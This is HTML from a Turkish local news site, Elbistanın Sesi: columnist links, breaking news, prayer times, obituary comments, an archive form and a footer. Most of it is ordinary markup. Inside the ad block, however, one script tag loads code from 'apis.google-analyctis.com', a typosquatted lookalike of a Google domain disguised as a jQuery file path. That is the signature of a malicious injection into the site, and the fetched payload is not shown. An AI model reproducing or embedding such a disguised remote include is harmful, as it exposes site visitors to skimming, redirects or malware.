            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/yazarlar_koYesi.jpg" alt="Aykut YILDIRIM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/70/aykut-yildirim" title="Aykut YILDIRIM">Aykut YILDIRIM</a></h4>
              <a href="https://www.elbistaninsesi.com/arf-hocanin-dedigi-gibi-makale,6323.html" title="ARF HOCANIN DEDİĞİ GİBİ…" >ARF HOCANIN DEDİĞİ GİBİ…</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/allah-acinizi-unutturmasin-makale,6321.html" title="ALLAH ACINIZI UNUTTURMASIN" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/kitap1.jpg" alt="Sevda Küçük">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/62/sevda-kucuk" title="Sevda Küçük">Sevda Küçük</a></h4>
              <a href="https://www.elbistaninsesi.com/allah-acinizi-unutturmasin-makale,6321.html" title="ALLAH ACINIZI UNUTTURMASIN" >ALLAH ACINIZI UNUTTURMASIN</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/yonetimde-basari-nasil-saglanir-makale,6320.html" title="YÖNETİMDE BAŞARI NASIL SAĞLANIR?" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmetcavaY.jpg" alt="Prof.Dr. Mehmet ÇAVAŞ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/39/profdr-mehmet-cavas" title="Prof.Dr. Mehmet ÇAVAŞ">Prof.Dr. Mehmet ÇAVAŞ</a></h4>
              <a href="https://www.elbistaninsesi.com/yonetimde-basari-nasil-saglanir-makale,6320.html" title="YÖNETİMDE BAŞARI NASIL SAĞLANIR?" >YÖNETİMDE BAŞARI NASIL SAĞLANIR?</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/gonul-mevsimleri-makale,6309.html" title="GÖNÜL MEVSİMLERİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/11.jpg" alt="Nusret Yılmaz Külekçi">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/74/nusret-yilmaz-kulekci" title="Nusret Yılmaz Külekçi">Nusret Yılmaz Külekçi</a></h4>
              <a href="https://www.elbistaninsesi.com/gonul-mevsimleri-makale,6309.html" title="GÖNÜL MEVSİMLERİ" >GÖNÜL MEVSİMLERİ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/6698-sayili-kisisel-verilerin-korunmasi-kanunu-makale,6306.html" title="6698 SA­YI­LI KİŞİSEL VERİLERİN KO­RUN­MA­SI KA­NU­NU" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/tara0006.jpg" alt="Av. Fatma Okur">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/100/av-fatma-okur" title="Av. Fatma Okur">Av. Fatma Okur</a></h4>
              <a href="https://www.elbistaninsesi.com/6698-sayili-kisisel-verilerin-korunmasi-kanunu-makale,6306.html" title="6698 SA­YI­LI KİŞİSEL VERİLERİN KO­RUN­MA­SI KA­NU­NU" >6698 SA­YI­LI KİŞİSEL VERİLERİN KO­RUN­MA­SI KA­NU­NU</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/cikmaz-sokaktan-kurtuluyoruz-makale,6298.html" title="Çıkmaz Sokaktan Kurtuluyoruz" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/vesikalYk_a_g.jpeg" alt="Ahmet Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/3/ahmet-gocer" title="Ahmet Göçer">Ahmet Göçer</a></h4>
              <a href="https://www.elbistaninsesi.com/cikmaz-sokaktan-kurtuluyoruz-makale,6298.html" title="Çıkmaz Sokaktan Kurtuluyoruz" >Çıkmaz Sokaktan Kurtuluyoruz</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/hasretin-safaginda-azazen-makale,6293.html" title="Has­re­tin şa­fa­ğın­da aza­zen" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Prof._Dr._Mustafa_Necati_DaglY.jpg" alt="Prof. Dr. Mustafa Necati Daglı">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/90/prof-dr-mustafa-necati-dagli" title="Prof. Dr. Mustafa Necati Daglı">Prof. Dr. Mustafa Necati Daglı</a></h4>
              <a href="https://www.elbistaninsesi.com/hasretin-safaginda-azazen-makale,6293.html" title="Has­re­tin şa­fa­ğın­da aza­zen" >Has­re­tin şa­fa­ğın­da aza­zen</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/elbistanin-bilinen-koskerlerinin-tamami-makale,6289.html" title="Elbistan’ın bilinen köşkerlerinin tamamı" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/1.jpg" alt="Arif  Bilgin">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/1/arif-bilgin" title="Arif  Bilgin">Arif  Bilgin</a></h4>
              <a href="https://www.elbistaninsesi.com/elbistanin-bilinen-koskerlerinin-tamami-makale,6289.html" title="Elbistan’ın bilinen köşkerlerinin tamamı" >Elbistan’ın bilinen köşkerlerinin tamamı</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/elbistan-ve-civarinda-bulunan-tarihi-yapilar-makale,6282.html" title="Elbistan ve Civarında Bulunan Tarihi Yapılar" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/034421b8-4158-4551-83a7-c308f4156fe9.jpg" alt="Orhan SAYDAM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/89/orhan-saydam" title="Orhan SAYDAM">Orhan SAYDAM</a></h4>
              <a href="https://www.elbistaninsesi.com/elbistan-ve-civarinda-bulunan-tarihi-yapilar-makale,6282.html" title="Elbistan ve Civarında Bulunan Tarihi Yapılar" >Elbistan ve Civarında Bulunan Tarihi Yapılar</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/elli-saniye-makale,6281.html" title="ELLİ SANİYE" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Makale.jpg" alt="Meltem Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/53/meltem-gocer" title="Meltem Göçer">Meltem Göçer</a></h4>
              <a href="https://www.elbistaninsesi.com/elli-saniye-makale,6281.html" title="ELLİ SANİYE" >ELLİ SANİYE</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/yasamak-icin-mi-yemek-yemek-icin-mi-yasamak-makale,6267.html" title="YAŞAMAK İÇİN Mİ YEMEK, YEMEK İÇİN Mİ YAŞAMAK" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Nermin-yılmaz-akbalaban.jpg" alt="Nermin Yılmaz Akbalaban">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/96/nermin-yilmaz-akbalaban" title="Nermin Yılmaz Akbalaban">Nermin Yılmaz Akbalaban</a></h4>
              <a href="https://www.elbistaninsesi.com/yasamak-icin-mi-yemek-yemek-icin-mi-yasamak-makale,6267.html" title="YAŞAMAK İÇİN Mİ YEMEK, YEMEK İÇİN Mİ YAŞAMAK" >YAŞAMAK İÇİN Mİ YEMEK, YEMEK İÇİN Mİ YAŞAMAK</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/profdrfuat-sezginin-ardindan-5-makale,6258.html" title="Prof.Dr.Fuat Sezgin’in Ardından -5-" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/6faefd20-9b1e-418c-b102-3b2d1b2c5463.jpg" alt="Adnan YILMAZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/88/adnan-yilmaz" title="Adnan YILMAZ">Adnan YILMAZ</a></h4>
              <a href="https://www.elbistaninsesi.com/profdrfuat-sezginin-ardindan-5-makale,6258.html" title="Prof.Dr.Fuat Sezgin’in Ardından -5-" >Prof.Dr.Fuat Sezgin’in Ardından -5-</a>
            </div>
          </a>
          </div>
              </div>
    </div>
  </div>

  
  <!-- SON DAKIKA VE OZEL HABER -->
  <div class="sonozeltab">

    <ul class="nav nav-tabs" id="sonozel">
      <li class="active"><a href="#sondakika" data-toggle="tab" class="sondakika">Son Dakika</a></li>      <li class=""><a href="#ozelhaber" data-toggle="tab" class="ozelhaber">Özel Haber</a></li>    </ul>

    <div class="tab-content">

            <div class="tab-pane active" id="sondakika">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="https://www.elbistaninsesi.com/guncel/kiraz-agaci-ekim-ayinda-cicek-acti-h71428.html" title="Kiraz ağacı ekim ayında çiçek açtı" >Kiraz ağacı ekim ayında çiçek açtı</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/guncel/daha-temiz-bir-nurhak-icin-7den-70e-bir-araya-geldiler-h70967.html" title="Daha temiz bir Nurhak için 7’den 70’e bir araya geldiler" >Daha temiz bir Nurhak için 7’den 70’e bir araya geldiler</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/guncel/terbuzekteki-kirmizi-benekli-alabalik-olumleri-vatandasi-endiselendiriyor-h70711.html" title="Terbüzek’teki kırmızı benekli alabalık ölümleri vatandaşı endişelendiriyor" >Terbüzek’teki kırmızı benekli alabalık ölümleri vatandaşı endişelendiriyor</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/guncel/elbistanda-82-bin-doz-asi-yapildi-h70610.html" title="Elbistan’da 82 bin doz aşı yapıldı" >Elbistan’da 82 bin doz aşı yapıldı</a></li>
          
          <li class="last"><a href="https://www.elbistaninsesi.com/guncel/besi-osbye-bolge-muduru-alinacak-h70602.html" title="Besi OSB’ye bölge müdürü alınacak" >Besi OSB’ye bölge müdürü alınacak</a></li>
                  </ul>
      </div>
      
            <div class="tab-pane" id="ozelhaber">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="https://www.elbistaninsesi.com/ekonomi/yapalak-santralinin-gelecegini-migemin-gorusu-belirleyecek-h37268.html" title="Yapalak santralinin geleceğini, MİGEMin görüşü belirleyecek" >Yapalak santralinin geleceğini, MİGEM’in görüşü belirleyecek</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/vefatlar/durmus-ali-yavuz-80-yasinda-h37225.html" title="Durmuş Ali Yavuz 80 yaşında" >Durmuş Ali Yavuz 80 yaşında</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/ekonomi/pancardaki-polar-orani-mahkemelik-oldu-h37167.html" title="Pancardaki polar oranı, mahkemelik oldu" >Pancardaki polar oranı, mahkemelik oldu</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/guncel/boyle-saka-gorulmedi-h34847.html" title="Böyle şaka görülmedi!" >Böyle şaka görülmedi!</a></li>
          
          <li class="last"><a href="https://www.elbistaninsesi.com/guncel/eshab-i-kehf-kulliyesine-konaklama-tesisi-h34004.html" title="Eshab-ı Kehf Külliyesine konaklama tesisi" >Eshab-ı Kehf Külliyesi’ne konaklama tesisi</a></li>
                  </ul>
      </div>
      
    </div>
  </div>
  
<!-- NAMAZ VAKITLERI -->
  <div class="namazvakitleri">
    <div class="title">
      <h5>Namaz Vakitleri</h5>
      <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right">
                <option value="adana" >Adana</option>
                <option value="adiyaman" >Adıyaman</option>
                <option value="afyon" >Afyon</option>
                <option value="agri" >Ağrı</option>
                <option value="aksaray" >Aksaray</option>
                <option value="amasya" >Amasya</option>
                <option value="ankara" >Ankara</option>
                <option value="antalya" >Antalya</option>
                <option value="ardahan" >Ardahan</option>
                <option value="artvin" >Artvin</option>
                <option value="aydin" >Aydın</option>
                <option value="balikesir" >Balıkesir</option>
                <option value="bartin" >Bartın</option>
                <option value="batman" >Batman</option>
                <option value="bayburt" >Bayburt</option>
                <option value="bilecik" >Bilecik</option>
                <option value="bingol" >Bingöl</option>
                <option value="bitlis" >Bitlis</option>
                <option value="bolu" >Bolu</option>
                <option value="burdur" >Burdur</option>
                <option value="bursa" >Bursa</option>
                <option value="canakkale" >Çanakkale</option>
                <option value="cankiri" >Çankırı</option>
                <option value="corum" >Çorum</option>
                <option value="denizli" >Denizli</option>
                <option value="diyarbakir" >Diyarbakır</option>
                <option value="duzce" >Düzce</option>
                <option value="edirne" >Edirne</option>
                <option value="elazig" >Elazığ</option>
                <option value="erzincan" >Erzincan</option>
                <option value="erzurum" >Erzurum</option>
                <option value="eskisehir" >Eskişehir</option>
                <option value="gaziantep" >Gaziantep</option>
                <option value="giresun" >Giresun</option>
                <option value="gumushane" >Gümüşhane</option>
                <option value="hakkari" >Hakkari</option>
                <option value="hatay" >Hatay</option>
                <option value="igdir" >Iğdır</option>
                <option value="isparta" >Isparta</option>
                <option value="istanbul" >İstanbul</option>
                <option value="izmir" >İzmir</option>
                <option value="kahramanmaras" selected>Kahramanmaraş</option>
                <option value="karabuk" >Karabük</option>
                <option value="karaman" >Karaman</option>
                <option value="kars" >Kars</option>
                <option value="kastamonu" >Kastamonu</option>
                <option value="kayseri" >Kayseri</option>
                <option value="kirikkale" >Kırıkkale</option>
                <option value="kirklareli" >Kırklareli</option>
                <option value="kirsehir" >Kırşehir</option>
                <option value="kilis" >Kilis</option>
                <option value="izmit" >Kocaeli</option>
                <option value="konya" >Konya</option>
                <option value="kutahya" >Kütahya</option>
                <option value="malatya" >Malatya</option>
                <option value="manisa" >Manisa</option>
                <option value="mardin" >Mardin</option>
                <option value="mersin" >Mersin</option>
                <option value="mugla" >Muğla</option>
                <option value="mus" >Muş</option>
                <option value="nevsehir" >Nevşehir</option>
                <option value="nigde" >Niğde</option>
                <option value="ordu" >Ordu</option>
                <option value="osmaniye" >Osmaniye</option>
                <option value="rize" >Rize</option>
                <option value="adapazari" >Sakarya</option>
                <option value="samsun" >Samsun</option>
                <option value="siirt" >Siirt</option>
                <option value="sinop" >Sinop</option>
                <option value="sivas" >Sivas</option>
                <option value="sanliurfa" >Şanlıurfa</option>
                <option value="sirnak" >Şırnak</option>
                <option value="tekirdag" >Tekirdağ</option>
                <option value="tokat" >Tokat</option>
                <option value="trabzon" >Trabzon</option>
                <option value="tunceli" >Tunceli</option>
                <option value="usak" >Uşak</option>
                <option value="van" >Van</option>
                <option value="yalova" >Yalova</option>
                <option value="yozgat" >Yozgat</option>
                <option value="zonguldak" >Zonguldak</option>
              </select>
    </div>
      <div class="sonuc">

      <table cellspacing="0" cellpadding="0" id="vakitler">
          <tr>
            <th>İmsak</th>
            <th>Güneş</th>
            <th>Öğle</th>
            <th>İkindi</th>
            <th>Akşam</th>
            <th>Yatsı</th>
          </tr>
          <tr>
            <td>05:04</td>
            <td>06:24</td>
            <td>12:26</td>
            <td>15:42</td>
            <td>18:17</td>
            <td>19:32</td>
          </tr>
      </table>


      </div>

  </div>

  <div class="reklam reklam208"><iframe name=BIKADV src="https://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe>
<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div>
  <!-- SON YORUMLAR -->
  <div class="son-yorumlar">
    <div class="header">
      <h5>Son Yorumlar</h5>
    </div>
    <div class="content">
      <ul class="unstyled hs-liste add-last">
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/ismet-koseoglu-69-yasinda-h71420.html#comment_361237" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/afra-ipek-6-yasinda-h71419.html#comment_361236" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-necibe-kucuk-h71434.html#comment_361235" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/anma-ismail-kupeli-h71435.html#comment_361234" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/halil-aslan-87-yasinda-h71405.html#comment_361232" title="" >Çocukken Bayram sabahı ilk Halil dayının...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/anma-ismail-kupeli-h71435.html#comment_361231" title="" >ALLAH RAHMET EYLESİN</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/anma-ismail-kupeli-h71435.html#comment_361230" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/halil-aslan-87-yasinda-h71405.html#comment_361229" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-necibe-kucuk-h71434.html#comment_361228" title="" >Allah rahmet eylesin... Ailesine ve yakınlarına...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-bekir-erdogan-h71228.html#comment_361225" title="" >Oğlu olarak ailem adına tüm başsağlığı...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/fahri-guzeloz-84-yasinda-h71431.html#comment_361224" title="" >Terzmiz Fahri Güzelöz Efendiye ALLAH &#39;tan...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mehmet-ozer-40-yasinda-h71356.html#comment_361223" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/taso-tasolar-68-yasinda-h71376.html#comment_361222" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/halil-aslan-87-yasinda-h71405.html#comment_361221" title="" >Merhum halil abimize Allah tan rahmet yakınlarına...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/ismet-koseoglu-69-yasinda-h71420.html#comment_361220" title="" >Hakkın rahmetine kavuşan merhum/merhumeye...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/ali-guzel-84-yasinda-h71288.html#comment_361217" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/kose-gunes-h71299.html#comment_361216" title="" >Kose dayi iyi bir insandi Allah Rahmet eylesin...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/huri-ozturk-84-yasinda-h71417.html#comment_361215" title="" >merhumeye ALLAH dan rahmet diliyorum başınız...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/anma-ismail-kupeli-h71435.html#comment_361214" title="" >RABBİM RAHMETİYLE MERHAMETİYLE VE ŞEFKATİYLE...</a></li>
                <li class="last"><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-ahmet-bulut-h71396.html#comment_361213" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN.</a></li>
              </ul>
    </div>
  </div>

  
<!-- ARSIV -->
<div class="arsiv">
  <div class="header">
    <h5>Arşiv</h5>
  </div>
  <div class="content">
    <form action="https://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" >
      <select name="gun" class="day span1">
                <option value="01" >01</option>
                <option value="02" >02</option>
                <option value="03" >03</option>
                <option value="04" >04</option>
                <option value="05" selected>05</option>
                <option value="06" >06</option>
                <option value="07" >07</option>
                <option value="08" >08</option>
                <option value="09" >09</option>
                <option value="10" >10</option>
                <option value="11" >11</option>
                <option value="12" >12</option>
                <option value="13" >13</option>
                <option value="14" >14</option>
                <option value="15" >15</option>
                <option value="16" >16</option>
                <option value="17" >17</option>
                <option value="18" >18</option>
                <option value="19" >19</option>
                <option value="20" >20</option>
                <option value="21" >21</option>
                <option value="22" >22</option>
                <option value="23" >23</option>
                <option value="24" >24</option>
                <option value="25" >25</option>
                <option value="26" >26</option>
                <option value="27" >27</option>
                <option value="28" >28</option>
                <option value="29" >29</option>
                <option value="30" >30</option>
                <option value="31" >31</option>
              </select>
      <select name="ay" class="month span1">
                <option value="01" >Ocak</option>
                <option value="02" >Şubat</option>
                <option value="03" >Mart</option>
                <option value="04" >Nisan</option>
                <option value="05" >Mayıs</option>
                <option value="06" >Haziran</option>
                <option value="07" >Temmuz</option>
                <option value="08" >Ağustos</option>
                <option value="09" >Eylül</option>
                <option value="10" selected>Ekim</option>
                <option value="11" >Kasım</option>
                <option value="12" >Aralık</option>
              </select>
      <select name="yil" class="year span1">
                <option value="2021" selected>2021</option>
                <option value="2020" >2020</option>
                <option value="2019" >2019</option>
                <option value="2018" >2018</option>
                <option value="2017" >2017</option>
              </select>
      <button type="submit" class="btn btn-default span1 pull-right">Ara</button>
    </form>
  </div>
</div>


  


        </div>
        
      </div>

        
                <!-- Sol Dikey Reklam -->
        <div class="reklam dikey sol" style="width:px;height:px;">

                                                                                                                                                                            </div>
        
        <!-- Sağ Dikey Reklam -->
        <div class="reklam dikey sag ortala" style="width:px;height:px;">

                                                                <p style="width:160px;"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- kaynarca -->
<ins class="adsbygoogle"
 style="display:block"
 data-ad-client="ca-pub-3633419220222736"
 data-ad-slot="5807534991"
 data-ad-format="auto"
 data-full-width-responsive="true"></ins>
<script>
 (adsbygoogle = window.adsbygoogle || []).push({});
</script></p>
              
                                                                                                                                                                                                      </div>

        
      </div>

      <!-- FOOTER -->
<div id="siteFooter" class="footer">

      <div class="row-fluid">
      <div class="container center">
        <div class="span4">
          <div>Copyright © 2021 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div>
          <div class="footer-social">
            <a href="https://facebook.com/elbistaninsesi" rel="nofollow"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a>
            <a href="https://twitter.com/elbistaninsesi" rel="nofollow"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a>
            <a href="https://www.elbistaninsesi.com/rss"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a>
          </div>
        </div>
        <div class="span4 text-center">
          <div class="footer-logo"><a href="https://www.elbistaninsesi.com/" class="logo"><img src="https://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Drone destekli trafik denetimleri yapılacak" /></a></div>
        </div>
        <div class="span4">
          <p>&lt;center&gt;

0 (344) 415 04 15 &lt;br&gt;
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="e6838a848f959287888f889583958f81879c839283958fa6818b878f8ac885898b">[email&#160;protected]</a>
&lt;br&gt;Kızılcaoba Mah. Kışla Cad. 19/1&lt;/center&gt;

    </p>          <p><span class="site-info glyphicons earphone" style="padding-left: 0;"></span> 0 (344) 415 04 15</p>        </div>
      </div>
      </div>

      <div id="footer-alt" class="row-fluid">

        <div class="container center">

        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/sitene-ekle.html" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div>
        </div>

        </div>
      </div>



      <div class="row-fluid">
      <div class="container center">
        <div class="span12 text-center">
          <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p>         <a href="https://www.tebilisim.com/" target="_blank" title="haber sistemi, haber scripti, haber yazılımı, tebilişim"><p>Yazılım: TE Bilişim</p></a> 
        </div>
      </div>
      </div>

  <div id="top" class="btn btn-inverse">Yukarı Çık</div>
</div>
      <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>
var facebook_paylasim_secret_token, facebook_paylasim_app_id;
facebook_paylasim_app_id = "";
facebook_paylasim_secret_token = "";
if (location.href.match(/\?.*/) && document.referrer) {
   location.href = location.href.replace(/\?.*/, '');
}
</script>
<div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
  <div class="modal-header">
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
    <h3 id="myModalLabel">Üye Girişi</h3>
  </div>
  <div class="modal-body">
<form class="form-horizontal" action="https://www.elbistaninsesi.com/index.php?m=login&amp;rd=https%3A%2F%2Fwww.elbistaninsesi.com%2Fguncel%2Fdrone-destekli-trafik-denetimleri-yapilacak-h71450.html" method="post">
  <div class="control-group">
    <label class="control-label" for="inputName">Kullanıcı Adı</label>
    <div class="controls">
      <input id="inputName" value="" name="kullanici" type="text"  placeholder="Kullanıcı Adı" required>
    </div>
  </div>
  <div class="control-group">
    <label class="control-label" for="inputPassword">Şifre</label>
    <div class="controls">
      <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required>
    </div>
  </div>
  <div class="control-group">
    <div class="controls">
      <button type="submit" class="btn hs-sdch btn-info">Giriş Yap</button>
    </div>
  </div>
</form>
  </div>
  <div class="modal-footer">
    <a href="https://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a>
    <a href="https://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a>
    <button class="btn hs-sdch btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button>
  </div>
</div>




<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script>
